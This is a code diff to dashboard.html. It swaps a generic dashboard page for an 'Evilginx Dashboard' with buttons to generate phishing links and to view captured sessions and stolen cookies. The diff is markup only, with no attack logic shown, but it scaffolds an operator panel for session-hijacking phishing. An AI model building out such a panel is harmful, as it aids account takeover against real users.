--- a/dashboard.html
+++ b/dashboard.html
@@ -5,21 +5,19 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Dashboard</title>
     <link rel="stylesheet" href="styles.css">
-
-    <!-- Firebase SDK -->
-    <script src="https://www.gstatic.com/firebasejs/10.7.1/firebase-app.js"></script>
-    <script src="https://www.gstatic.com/firebasejs/10.7.1/firebase-auth.js"></script>
-    
-    <!-- Firebase Config -->
-    <script src="firebase-config.js"></script>
-
-    <!-- Dashboard script -->
-    <script defer src="dashboard.js"></script>
 </head>
 <body>
-    <div class="dashboard-container">
-        <h2>Welcome to the Dashboard</h2>
-        <button id="logoutButton">Logout</button>
+    <div class="dashboard">
+        <h1>Evilginx Dashboard</h1>
+        <button id="generateLinkBtn">Generate Phishing Link</button>
+        <button id="viewSessionsBtn">View Captured Sessions</button>
+        <button id="viewCookiesBtn">View Cookies</button>
+        <button id="logoutBtn">Logout</button>
+        
+        <div id="output"></div>
     </div>
+
+    <script src="firebase-config.js"></script>
+    <script src="script.js"></script>
 </body>
 </html>
